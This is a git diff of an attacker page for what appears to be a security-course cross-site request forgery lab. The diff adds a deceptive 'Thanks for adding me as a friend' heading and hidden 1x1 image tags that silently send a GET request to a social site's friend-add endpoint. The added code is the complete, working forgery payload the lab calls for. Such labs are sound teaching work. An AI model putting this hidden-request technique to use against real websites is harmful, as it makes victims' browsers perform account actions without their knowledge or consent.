--- a/HW2_3_XSS_Forgery/Labsetup/attacker/addfriend.html
+++ b/HW2_3_XSS_Forgery/Labsetup/attacker/addfriend.html
@@ -1,6 +1,9 @@
 <html>
+
 <body>
-<h1>This page forges an HTTP GET request</h1>
-<img src="" alt="image" width="1" height="1" />
+    <h1>Thanks for adding me as a friend.</h1>
+    <img src="http://www.seed-server.com/profile/samy" alt="image" width="1" height="1" />
+    <img src="http://www.seed-server.com/action/friends/add?friend=59" alt="image" width="1" height="1" />
 </body>
+
 </html>
